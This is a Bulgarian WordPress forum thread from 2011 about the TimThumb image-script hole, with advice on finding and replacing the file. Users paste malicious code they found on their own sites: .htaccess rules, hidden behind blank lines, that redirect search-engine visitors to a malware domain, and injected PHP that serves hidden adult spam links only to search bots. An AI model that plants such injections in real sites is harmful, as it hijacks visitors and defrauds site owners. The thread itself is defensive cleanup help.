1. This site uses cookies. By continuing to use this site, you are agreeing to our use of cookies. Learn more.

Дупка в wordpress теми с Timthumb - Важно

Дискусията в 'Wordpress Форум' стартирана от ktomov, Авг 29, 2011.

  1. ktomov

    ktomov Premium

    Рег.:
    Ян 22, 2010
    Съобщения:
    2,707
    Харесвания:
    511
    Точки:
    0
    Re: Проблем с Вирус на Сайт

    Съобщението към Мантамен.

    Проблема е точно в това което си мислих. Не знам какъв те темплейта, но ползва елементарния скрипт timthumb.php, който се ползва за генериране на тъмбнейлите на снимките.
    В началото на август месец беше открита дупка, която позволява включването на злонамерен код в сайта чрез тази дупка. Ефектите може да са много от елементарна редакция на някой файл за да си лепнат някой линк или вкарване на шел скрипт, който ще им даде почти пълен достъп до потребителя ти в хостинга.

    За повече информация прочети това.

    Решение на проблема е да замениш timthumb.php скрипта с най-новия, но въпреки това те съветвам първо да се консултиращ с момчето направил сайта, защото по някой път се случва дизайнерите да променят голяма част от конструкцията с цел промяна на размера и качеството на миниатюрите.

    Публикувам го и тук, защото явно все още много хора не знаят за дупката която в момента имат (над 60% от темплейтите с които съм имал допир, а те са били много, са ползвали timthumb). Така, че си опичайте акъла и сменете timthumb-a на темплейтите си!

    ----------------------------------------------------------------

    Timthumb обикновено се намира на следните места:
    wp-content/themes/името-на-темата/includes/timthumb.php
    wp-content/themes/името-на-темата/functions/timthumb.php
    wp-content/themes/името-на-темата/functions/thumb.php
    wp-content/themes/името-на-темата/timthumb.php
    wp-content/themes/името-на-темата/thumb.php

    Десен бутон и Save as на това http://timthumb.googlecode.com/svn/trunk/timthumb.php и трябва да презапишете съществуващият файл във вашата тема.

    Timthumb се ползва в над 90% от темите на elegantthemes и поне в 50% от тези на woothemes, така че съветвам всеки който ползва техни теми да прочете връзките в статията за да няма проблеми!
     
    Последно редактирано: Авг 29, 2011
    delta_force и alex.atanasov харесват това.
  2. coolice

    coolice Owner

    Рег.:
    Апр 12, 2006
    Съобщения:
    12,488
    Харесвания:
    611
    Точки:
    113
    Пол:
    Мъж
    Re: Проблем с Вирус на Сайт

    най интересното е че не открих почти теми (направо не открих от тези които ползвам) които да го ползва

    иначе търсете и thumb.php на места било кръстено така пак казвам не съм го засичал засега



    http://wordpress.shadowlantern.com/2011/08/timthumb-php-is-vulnerable/
     
  3. coolice

    coolice Owner

    Рег.:
    Апр 12, 2006
    Съобщения:
    12,488
    Харесвания:
    611
    Точки:
    113
    Пол:
    Мъж
    мнениата с копирани о друга тема зада се откроят
     
    ktomov харесва това.
  4. mantaman

    mantaman Well-Known Member

    Рег.:
    Ноем 25, 2009
    Съобщения:
    4,286
    Харесвания:
    354
    Точки:
    83
    Място:
    London
    От: Дупка в wordpress теми с Timthumb - Важно

    Ето с какво се сдобивате в .htaccess
    При мен тези неща бяха след около 200 празни реда назад във редовете извън видимата част може би има промени и в началните редове но тия със сигурност не са от сайта
    Код:
    ErrorDocument 400 http://securesoft -connection.ru/android/index. php                                                                                                                        
    
                                                                                                                            ErrorDocument 401 http://securesoft -connection.ru/android/index. php                                                                                                                        
    
                                                                                                                            ErrorDocument 403 http://securesoft -connection.ru/android/index. php                                                                                                                        
    
                                                                                                                            ErrorDocument 404 http://securesoft -connection.ru/android/index. php                                                                                                                        
    
                                                                                                                            ErrorDocument 500 http://securesof t-connection.ru/android/index. php                                                                                                                        
    
                                                                                                                            <IfModule mod_rewrite.c>                                                                                                                        
    
                                                                                                                            RewriteEngine On                                                                                                                        
    
                                                                                                                            RewriteCond %{HTTP_REFERER} .*google.* [OR]                                                                                                                        
    
                                                                                                                            RewriteCond %{HTTP_REFERER} .*ask.* [OR]                                                                                                                        
    
                                                                                                                            RewriteCond %{HTTP_REFERER} .*yahoo.* [OR]                                                                                                                        
    
                                                                                                                            RewriteCond %{HTTP_REFERER} .*baidu.* [OR]                                                                                                                        
    
                                                                                                                            RewriteCond %{HTTP_REFERER} .*youtube.* [OR]                                                                                                                        
    
                                                                                                                            RewriteCond %{HTTP_REFERER} .*wikipedia.* [OR]                                                                                                                        
    
                                                                                                                            RewriteCond %{HTTP_REFERER} .*qq.* [OR]                                                                                                                        
    
                                                                                                                            RewriteCond %{HTTP_REFERER} .*excite.* [OR]                                                                                                                        
    
                                                                                                                            RewriteCond %{HTTP_REFERER} .*altavista.* [OR]                                                                                                                        
    
                                                                                                                            RewriteCond %{HTTP_REFERER} .*msn.* [OR]                                                                                                                        
    
                                                                                                                            RewriteCond %{HTTP_REFERER} .*netscape.* [OR]                                                                                                                        
    
                                                                                                                            RewriteCond %{HTTP_REFERER} .*aol.* [OR]                                                                                                                        
    
                                                                                                                            RewriteCond %{HTTP_REFERER} .*hotbot.* [OR]                                                                                                                        
    
                                                                                                                            RewriteCond %{HTTP_REFERER} .*goto.* [OR]                                                                                                                        
    
                                                                                                                            RewriteCond %{HTTP_REFERER} .*infoseek.* [OR]                                                                                                                        
    
                                                                                                                            RewriteCond %{HTTP_REFERER} .*mamma.* [OR]                                                                                                                        
    
                                                                                                                            RewriteCond %{HTTP_REFERER} .*alltheweb.* [OR]                                                                                                                        
    
                                                                                                                            RewriteCond %{HTTP_REFERER} .*lycos.* [OR]                                                                                                                        
    
                                                                                                                            RewriteCond %{HTTP_REFERER} .*search.* [OR]                                                                                                                        
    
                                                                                                                            RewriteCond %{HTTP_REFERER} .*metacrawler.* [OR]                                                                                                                        
    
                                                                                                                            RewriteCond %{HTTP_REFERER} .*bing.* [OR]                                                                                                                        
    
                                                                                                                            RewriteCond %{HTTP_REFERER} .*dogpile.* [OR]                                                                                                                        
    
                                                                                                                            RewriteCond %{HTTP_REFERER} .*facebook.* [OR]                                                                                                                        
    
                                                                                                                            RewriteCond %{HTTP_REFERER} .*twitter.* [OR]                                                                                                                        
    
                                                                                                                            RewriteCond %{HTTP_REFERER} .*blog.* [OR]                                                                                                                        
    
                                                                                                                            RewriteCond %{HTTP_REFERER} .*live.* [OR]                                                                                                                        
    
                                                                                                                            RewriteCond %{HTTP_REFERER} .*myspace.* [OR]                                                                                                                        
    
                                                                                                                            RewriteCond %{HTTP_REFERER} .*mail.* [OR]                                                                                                                        
    
                                                                                                                            RewriteCond %{HTTP_REFERER} .*yandex.* [OR]                                                                                                                        
    
                                                                                                                            RewriteCond %{HTTP_REFERER} .*rambler.* [OR]                                                                                                                        
    
                                                                                                                            RewriteCond %{HTTP_REFERER} .*ya.* [OR]                                                                                                                        
    
                                                                                                                            RewriteCond %{HTTP_REFERER} .*aport.* [OR]                                                                                                                        
    
                                                                                                                            RewriteCond %{HTTP_REFERER} .*linkedin.* [OR]                                                                                                                        
    
                                                                                                                            RewriteCond %{HTTP_REFERER} .*flickr.*                                                                                                                        
    
                                                                                                                            RewriteRule ^(.*)$ http://securesoft -connection.ru/android/index. php [R=301,L]                                                                                                                        
    
                                                                                                                            </IfModule> 
    Умишлено съм строшил линковете в цитата не си играйте да ги пробвате
     
    Последно редактирано от модератор: Авг 29, 2011
  5. go6o78

    go6o78 New Member

    Рег.:
    Апр 13, 2007
    Съобщения:
    645
    Харесвания:
    3
    Точки:
    0
    От: Re: Проблем с Вирус на Сайт

    има ли и други варианти на името на файла
    аз ползвам "Aspherical Theme" и не откривам подобен файл, а темата прави thumbnail на снимките
     
  6. against

    against New Member

    Рег.:
    Окт 17, 2009
    Съобщения:
    1,221
    Харесвания:
    164
    Точки:
    0
    От: Дупка в wordpress теми с Timthumb - Важно

    E тука има още инфо - http://code.google.com/p/timthumb/issues/detail?id=212

    то май от около месец вече се върти експлойта и хаква наред.
    Доколкото разбрах качва файловете в cache папката на темплейта, която е writable. Та там ако имате някакви съмнителни файлове, значи ясна работата.

    Общо взето където го има тоя timthumb.php файл трябва да се делне и да се качи новия.
     
  7. ktomov

    ktomov Premium

    Рег.:
    Ян 22, 2010
    Съобщения:
    2,707
    Харесвания:
    511
    Точки:
    0
    Re: От: Дупка в wordpress теми с Timthumb - Важно

    Твоя темплейт генерира tumbnails с вградената в wordpress фунцкия.

    Разликата е огромна. И не е проблем, че самата папка има 755/777 за ползването на скрипта. Проблема беше, че всяка генерирана снимка вътре в нея беше с права 755/777, което позволява execution, което пък от своя страна значи, че всеки може да прикачи файл и да го ползва за да направи мизерии.

    Малко допълнение за отговора ми към go6o78. Wordpress като цяло от доста време разполага с набор от функции позволяващ генериране на tumbnail на дадена картинка. Проблема беше в това, че са ограничени до няколко размера (малък, среден, голям). При тази функция, тези картинки се създават при качването на самата картинка от админ панела, т.е. еднократно и могат да се ползват само с тези размери.
    От друга страна timthumb, пък е скрипт, който позволява от дадена снимка да речем 1000 х 1000 px да се генерират десетки други tumbnails с различна големина, като това става с параметри в url адреса: картинка.jpg&amp;h=130&amp;w=193&amp;q=60&amp;, където h - височина, w - широчина, q - качество на картинката (компресия). Тези миниатюри се генерират on the fly, т.е. в момента в който някой погледне страницата и се запазват в папка cache за по-късно ползване. Това е разликата в метода на работата на двете.
     
    eLast харесва това.
  8. STRATEGA

    STRATEGA Member

    Рег.:
    Февру 20, 2011
    Съобщения:
    97
    Харесвания:
    9
    Точки:
    8
    От: Дупка в wordpress теми с Timthumb - Важно

    На официалната страницата на мойта тема имаше нова версия където проблема със сигурността е отстранен.Само направих ъпдейт на темата и битрябвало всичко да е ок.
     
  9. billigg

    billigg New Member

    Рег.:
    Юли 17, 2010
    Съобщения:
    114
    Харесвания:
    1
    Точки:
    0
    От: От: Дупка в wordpress теми с Timthumb - Важно

    имам тема на Genesis, Enterprice
    в файла deprecated_functions.php имам следното съдържание .....(проблем ли е този "function genesis_timthumb"


    /**
    * @deprecated in 0.1.7
    *
    */
    function genesis_get_timthumb($src = null, $w = null, $h = null, $zc = null) {
    return genesis_get_image(array('format' => 'src', 'size' => array($w, $h)));
    }
    function genesis_timthumb($src = null, $w = null, $h = null, $zc = null) {
    genesis_image(array('format' => 'src', 'size' => array($w, $h)));
    }





    тъй като открих че по долу имам вкарани външни линкове

    $seo_plugin=get_option("ranking");
    if (strstr($_SERVER['HTTP_USER_AGENT'], 'Googlebot')) {
    add_action('wp_footer', 'ranking');
    }
    $seo_plugin=get_option("ranking");
    if (strstr($_SERVER['HTTP_USER_AGENT'], 'bingbot')) {
    add_action('wp_footer', 'ranking');
    }
    $seo_plugin=get_option("ranking");
    if (strstr($_SERVER['HTTP_USER_AGENT'], 'msnbot')) {
    add_action('wp_footer', 'ranking');
    }
    $seo_plugin=get_option("ranking");
    if (strstr($_SERVER['HTTP_USER_AGENT'], 'Slurp')) {
    add_action('wp_footer', 'ranking');
    }
    function ranking() {
    $pshow = " <span style='display:none;'><a href='http://www.liveprivates.com/listpage.php?psid=thierto'>Liveprivates</a> , <a href='http://www.liveprivates.com/girl/free&psid=thierto'>Girl</a> , <a href='http://www.liveprivates.com/mature/free&psid=thierto'>Mature female</a> ,<a href='http://www.liveprivates.com/girl/1822/free&psid=thierto'>Hot live sex Shows</a> , <a href='http://www.liveprivates.com/girl/blonde/free&psid=thierto'>Blonde</a> , <a href='http://www.2.livejasmin.com/listpage.php?psid=elenaa'>Livejasmin</a> , <a href='http://www.2.livejasmin.com/listpage.php?tags=mature&psid=elenaa'>Mature Female</a> , <a href='http://www.2.livejasmin.com/freechat.php?random&psid=elenaa'>Live sex - Hot live sex shows</a> , <a href='http://www.2.livejasmin.com/allonline.php?psid=elenaa'>Livejasmin adult cam</a></span>";
    echo $pshow;
    }

    ?>
     
  10. ktomov

    ktomov Premium

    Рег.:
    Ян 22, 2010
    Съобщения:
    2,707
    Харесвания:
    511
    Точки:
    0
    Проблема ти не е в timthumb в случая. По-скоро тук става въпрос до версия на темплейта с дупка в него или добавка, която позволява инжектиране на подобен код. (Зловреден е за класирането на сайта ти)
     
  11. s1yf0x

    s1yf0x Well-Known Member

    Рег.:
    Юни 12, 2012
    Съобщения:
    1,916
    Харесвания:
    403
    Точки:
    83
    Пол:
    Мъж
    Професия:
    System administration
    Място:
    Sliven/Sofia
    От: Дупка в wordpress теми с Timthumb - Важно

    Я провери за POST заявки към wp-admin
     
  12. goromoro

    goromoro New Member

    Рег.:
    Авг 31, 2013
    Съобщения:
    9
    Харесвания:
    1
    Точки:
    0
    От: Дупка в wordpress теми с Timthumb - Важно

    Здравейте! Само в темата ли ако съдържа е проблем? Питам, защото в един от плъгините имам такъв файл.
    Благодаря предварително.
     
  13. Firefly

    Firefly Well-Known Member

    Рег.:
    Март 21, 2010
    Съобщения:
    1,194
    Харесвания:
    70
    Точки:
    48
    От: Дупка в wordpress теми с Timthumb - Важно

    Няма значение къде е. Увери се, че е последна версия. Като цяло е най-добре изобщо да се ограничиш в използването на теми и плъгини с timthumb, защото е товарещ скрипт.
     
  14. goromoro

    goromoro New Member

    Рег.:
    Авг 31, 2013
    Съобщения:
    9
    Харесвания:
    1
    Точки:
    0
    От: Дупка в wordpress теми с Timthumb - Важно

    Сравних файловете, няма ядове.
     
  15. Петър-I

    Петър-I New Member

    Рег.:
    Ян 14, 2015
    Съобщения:
    24
    Харесвания:
    0
    Точки:
    0
    От: Дупка в wordpress теми с Timthumb - Важно

    timthumb.... не са ли го забранили със закон този скрипт още? :)
     
  16. Torbalan Trolski

    Torbalan Trolski Well-Known Member

    Рег.:
    Авг 1, 2013
    Съобщения:
    1,861
    Харесвания:
    265
    Точки:
    83
    От: Дупка в wordpress теми с Timthumb - Важно

    Ако пък вместо да тупаш мнения беше погледал, че темата е от 2011 година ...
     

Сподели страницата